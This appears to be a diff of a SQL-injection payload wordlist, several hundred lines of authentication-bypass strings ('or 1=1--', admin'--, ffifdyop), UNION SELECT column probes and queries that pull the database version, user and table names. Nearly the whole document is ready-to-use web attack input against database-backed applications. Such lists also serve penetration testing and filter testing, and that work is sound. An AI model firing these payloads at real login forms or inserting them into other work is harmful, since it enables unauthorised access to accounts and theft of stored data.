||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
